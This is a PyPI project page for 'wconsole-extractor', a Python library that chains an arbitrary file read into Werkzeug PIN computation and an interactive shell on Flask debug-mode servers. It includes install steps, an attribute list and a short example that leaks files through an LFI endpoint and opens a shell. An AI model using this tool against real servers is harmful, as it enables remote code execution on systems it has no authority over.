No project description provided

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for Ruulian from gravatar.com Ruulian

Unverified details

These details have not been verified by PyPI
Project links
Meta
Classifiers

Project description

Welcome to WConsole Extractor 👋

Version License: MIT Twitter: Ruulian_

Wconsole Extractor is a library which allows to automatically exploit a flask debug mode server. You just need to write a file leak function, pass it to the class WConsoleExtractor constructor and you can access to all the elements related to the debug mode. Moreover, you can call the shell function to obtain an interactive shell.

✨ Demo

example_gif

🔨 Install

From PyPi

Global installation:

pip3 install wconsole-extractor

Python virtual environment:

python3 -m venv env
source env/bin/activate
pip3 install wconsole-extractor

# Deactivate environment
deactivate

Installation from repository

Global installation:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
pip3 install .

Python virtual environment:

git clone https://github.com/Ruulian/wconsole_extractor.git
cd wconsole_extractor
python3 -m venv env
source env/bin/activate
pip3 install .

# Deactivate environment
deactivate

📚 Documentation

Note: The target operating system must be a Linux distribution.

Prerequisites

In order to use correctly the library, you need to have an arbitrary file read on the target and implement it in python.

You must write a function that takes a filename as parameter and returns the content of the file on the target. If the file is not found, the function should return an empty string.

Available attributes

From WconsoleExtractor instance, you can access mutiple attributes:

# Target information
extractor.target               # Specified target
extractor.base_url             # Target base url
extractor.hostname             # hostname

# Versions
extractor.python_version       # Python version
extractor.werkzeug_version     # Werkzeug version

# Probably public bits
extractor.username             # User who launched the application
extractor.flask_path           # Flask installation path
extractor.modname              # Constant "flask.app"
extractor.class_name           # Constant "Flask"
extractor.probably_public_bits # Probably public bits [username, modname, class_name, flask_path]

# Private bits
extractor.machine_id           # Machine id
extractor.uuidnode             # MAC address in decimal
extractor.private_bits         # private bits

# Post process information
extractor.pin_code             # Werkzeug PIN CODE
extractor.token                # Werkzeug console token (available in HTML source code)

# Functions
extractor.shell()              # Get interactive shell

Example

from wconsole_extractor import WConsoleExtractor, info
import requests

def leak_function(filename) -> str:
    r = requests.get(f"http://localhost:5000/lfi?path={filename}")
    if r.status_code == 200:
        return r.text
    else:
        return ""

extractor = WConsoleExtractor(
    target="http://localhost:5000",
    leak_function=leak_function
)


info(f"PIN CODE: {extractor.pin_code}")
extractor.shell()

Author

👤 Ruulian

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!

📝 License

This project is MIT licensed.

This README was generated with ❤️ by readme-md-generator

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page